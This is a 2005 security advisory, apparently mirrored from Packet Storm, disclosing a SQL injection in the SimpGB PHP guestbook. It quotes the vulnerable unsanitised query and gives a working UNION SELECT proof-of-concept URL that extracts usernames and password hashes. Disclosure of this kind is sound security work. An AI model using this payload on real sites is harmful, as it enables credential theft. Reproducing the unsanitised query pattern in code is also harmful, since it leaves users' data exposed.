Lucene search
simpgbSQL.txt
ποΈΒ 17 Mar 2005Β 00:00:00Reported byΒ visusTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 29Β Views
SimpGB guestbook PHP vulnerability allows database exploitation to access user data.
Show more
`Hi,
The PHP guestbook SimpGB [1], written by Boesch IT-Consulting [2] can be
exploited to gain
userdata. The quote variable isn't checked carefully in
simpgb/include/gb_new.inc called
by guestbook.php.
I wrote a proof of concept which shows a md5 hash and the username, read
from the database.
simpgb/include/gb_new.inc:
50: if(isset($quote) && ($quote))
51: {
52: $sql = "select * from ".$tableprefix."_data where entrynr=$quote";
53: if(!$result = mysql_query($sql, $db))
54: die("Unable to connect to database.".mysql_error());
PoC:
http://[whereever the guestbook is]/simpgb/guestbook.php?lang=de&mode=new
"e=-1%20UNION%20SELECT%200,0,username,0,password,0,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20simpgb_users%20WHERE%201
The developer has been informed.
[1] http://www.boesch-it.de/sw/php-scripts/simpgb/english/download.php
[2] http://www.boesch-it.de
Greets to neonomicus who helped me getting the database structure of SimpGB.
visus
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4